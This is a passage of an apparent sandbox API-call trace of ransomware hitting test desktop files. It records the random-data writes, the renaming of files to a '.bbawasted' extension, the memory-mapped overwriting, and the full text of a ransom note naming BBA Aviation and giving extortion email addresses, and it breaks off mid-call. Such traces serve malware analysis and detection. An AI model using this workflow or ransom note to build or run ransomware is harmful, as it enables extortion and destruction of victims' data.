0x6c4b88 [0204.393] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.393] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0204.394] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.394] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0204.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\892r7Wt7HyBxi0b.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\892r7wt7hybxi0b.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0204.395] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.397] SetEndOfFile (hFile=0x290) returned 1 [0204.397] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.397] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\892r7Wt7HyBxi0b.png" (normalized: "c:\\users\\fd1hvy\\desktop\\892r7wt7hybxi0b.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\892r7Wt7HyBxi0b.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\892r7wt7hybxi0b.png.bbawasted")) returned 1 [0204.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\892r7Wt7HyBxi0b.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\892r7wt7hybxi0b.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0204.398] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0204.398] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1076b [0204.398] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1076b) returned 0x640000 [0204.398] CloseHandle (hObject=0x280) returned 1 [0204.405] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.406] CloseHandle (hObject=0x27c) returned 1 [0204.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.406] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0204.406] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.406] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0204.406] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0204.407] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.407] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0204.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.558] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bDzup1pL4yUN6ARWiW8iddqX/zlD+fQPX3M7IBybReURK6YnwN/SFnP4K7ALqfbY\r\nBJJzMfW65A3lYeZYgyD3fOvOaClzeRieDM/JhtyKV+kY6YNsc/Hkr3p9u8LWy8tm\r\nVNuSF18JTrPECU2dI7t5ru37c8Mky9e0/uxSkpm7+WfuQqu/KoB/Tg89Z4udCKP3\r\npnd5zjL1l2g6KKZwtlnHM3p2xwO9RuxRuunfZwTcJSQKNFH5qG/YlFEGpBZSO1sE\r\n0Pn3XrzYr1dM3SOJ+GbqrwwF64mgvclJcyqZ4kSEayRNDZIQsz2ICw7xBKOeCYdU\r\nHQam+wsNhNDwdznN6ENApvIst7S0Ob9UjgWCRaqXS/OM82uDoUA3ycxNRqKKebsk\r\nDFNlRcv9W+uXXOlX18SNUBTkrUzO5PFWInVSo8T1hHCAJSwhoZ4gmws3/NkFDO2a\r\nhwcp8sJNmB3jnVGAUITK9uoR6fYB+vBkeu4v/6t0iVySsMDwK/Ct6aPjmMIQRExl\r\nNiI/2kG/KT61YL6hklOJUS+p4/TXl0faL6R5GVn88+CJqAHKDvut4RxG8mhhzgYc\r\n1fxbGqzSmZs9ZxJ2oBxWpMuaivgQBw51oZWLfA/kh1gO4/V3N0iLrrGg7yAA9cnY\r\nTAIjJwH9d1PpgJzz2tPTIHwFevMbXclYyrqzV1Qs8JQ=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.558] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.558] SetEndOfFile (hFile=0x290) returned 1 [0204.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.561] CloseHandle (hObject=0x290) returned 1 [0204.564] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adcd8 | out: hHeap=0x660000) returned 1 [0204.565] _aulldvrm () returned 0x0 [0204.565] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0204.568] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.568] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0204.568] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hy0GJF7zfW.ppt") returned 47 [0204.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6adb18 [0204.568] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.568] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0204.569] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.569] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0204.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hy0GJF7zfW.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hy0gjf7zfw.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0204.570] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.572] SetEndOfFile (hFile=0x290) returned 1 [0204.572] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.572] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hy0GJF7zfW.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hy0gjf7zfw.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hy0GJF7zfW.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hy0gjf7zfw.ppt.bbawasted")) returned 1 [0204.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hy0GJF7zfW.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hy0gjf7zfw.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0204.574] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0204.574] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3829 [0204.574] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3829) returned 0x650000 [0204.575] CloseHandle (hObject=0x294) returned 1 [0204.585] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0204.585] CloseHandle (hObject=0x28c) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.585] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0204.587] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.587] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0204.587] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0204.588] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.588] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0204.598] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0204.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.599] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]d/jgWbVQCZyqd4Ahb+ATxjDeARFWMsRPMwycOW2jRP1U/IV0CItHMju9WZDQOKL4\r\n58GE6CmQpfyYsCAzi4kipjW5kk0tSh1pI+ZA37YVmlh1GP8dmEjr2ZBASWtHt6t5\r\nzh99cg8x8N5IrsxwDdA3EwK/4WtQFEhCev+Zek9jTc9dwBGSW8WDCOb28XJlzmZc\r\nQ45/YkkYlptR/21Ou+Gny3D9RCHNm/ec/eUl+ANNQyRv5QP6SqpG8EeI8AMT0GMg\r\n4nGxUlx48OpGvh5wizt9hQuFwRjVdrRr/jjjvTL6rsG2My4IUXlQPzV130gCsC0f\r\nL8hwq5jDlfOfTO17KUbah0PzEKgxDqOMmaBY9jQl8cLNg489C1AaGSGIg6cNeg2B\r\n/cWuioy9YXO5VHngzNL8B6ZikkQ3GJ6LxRD5oUt3J0gUeQN3swcRPGN2UgU7hG5E\r\nz4h5pzZLsZsHAs9vUu5JwTAjzdtQTCw7pYak5Ks8GHxv4HoZqd7O8WayOkvYTA1q\r\npl8vX//yElHOchDtU53LSAGgsFcXpKvStoglKnF0YSpA4n4DDrN7UuTMbNwJiysI\r\nYiNvODqsmlnuvjmzCAw1PTJqqasTpbtD4TZKOMs21EBf9TlfMRpAoLxOmLDM9rQg\r\n5JHETa4OMWwpr28bmxEJe/Z3AFYbCejNLon6y09N4d9=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.599] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.599] SetEndOfFile (hFile=0x290) returned 1 [0204.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.602] CloseHandle (hObject=0x290) returned 1 [0204.743] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0204.744] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x660000) returned 1 [0204.744] _aulldvrm () returned 0x0 [0204.744] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0204.745] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.745] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0204.745] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\i G6AmFq6B1SN 4NgF.mp3") returned 55 [0204.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6c4b88 [0204.745] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.745] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0204.746] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.746] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0204.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\i G6AmFq6B1SN 4NgF.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i g6amfq6b1sn 4ngf.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0204.747] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.748] SetEndOfFile (hFile=0x290) returned 1 [0204.748] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.748] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.748] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\i G6AmFq6B1SN 4NgF.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i g6amfq6b1sn 4ngf.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\i G6AmFq6B1SN 4NgF.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i g6amfq6b1sn 4ngf.mp3.bbawasted")) returned 1 [0204.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\i G6AmFq6B1SN 4NgF.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i g6amfq6b1sn 4ngf.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0204.749] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0204.750] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11f62 [0204.750] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f62) returned 0x640000 [0204.750] CloseHandle (hObject=0x280) returned 1 [0204.755] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.755] CloseHandle (hObject=0x288) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.755] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0204.756] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.756] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0204.756] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0204.757] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0204.757] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.773] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GY9zgv7d3JwgZrHalAGJROInrzQoOnWJ9KEYSp8J+om4iMksE/28kx5YDUtUosxa\r\nsnnaOUhtedzc77kTUB8aVMpw+02zntiM/xZdCQqQfrTZB3n48c9C8zdjbR0JUpLj\r\nDEu8P1agvrUp5rBn/qhOb7lvO/1nF69FIbV5lrOXP2/ofc5xyGF7HKZB6xa6866y\r\ngkGdw9W+QzzAQOicG/aRQAp58yQphhP1m7c+fFxPki6eZSgzPx+a/nrAvR4xyLGB\r\nFUP+Y05B65Wp08d29VRD8brB2Cc/0SgcNvCRf07eTlRCvr4fOWfrTeos85bH96gc\r\nrbgzovYS9TqHLO05RHmOm16b1C6HWe6voX38+eh2Ta5FYmzn76aYydzbfhpsf1ZZ\r\n8zp/9W6dX4IG4shFgjyBP5aIKlWH/lL/vKug58MwMt/7h3cSaaEBJqvmhIohV1Qx\r\nGVqFC4lP751SqK+J740BSMxSj50qwdKQVxdc/BGhFZUdsKXI6TlJNGQI8gCAXlIL\r\ndpQTSaVaEca2VbktdkUpsCJomViR2FSGG31ciJw5zD3We483M2w9clKG33gRrnJ/\r\n3NQP7dGtE6o0WCGVI2R+kZwxdNwq2qKTH30PYRJjuH1qhl7tt+3RN1tXIcTUFc/h\r\nN82tGGEW5vwZEGKC+YyIDnQTot7fyRfD9LWHioAB55w=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.773] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0204.774] SetEndOfFile (hFile=0x290) returned 1 [0204.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.776] CloseHandle (hObject=0x290) returned 1 [0204.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0330 | out: hHeap=0x660000) returned 1 [0204.783] _aulldvrm () returned 0x0 [0204.783] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0204.784] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0204.784] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0204.784] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\I7A41yPTyH2gM d.wav") returned 52 [0204.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0204.784] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.784] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0204.785] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.785] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0204.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\I7A41yPTyH2gM d.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i7a41yptyh2gm d.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0204.785] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.786] SetEndOfFile (hFile=0x290) returned 1 [0204.787] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.787] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\I7A41yPTyH2gM d.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i7a41yptyh2gm d.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\I7A41yPTyH2gM d.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i7a41yptyh2gm d.wav.bbawasted")) returned 1 [0204.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\I7A41yPTyH2gM d.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\i7a41yptyh2gm d.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 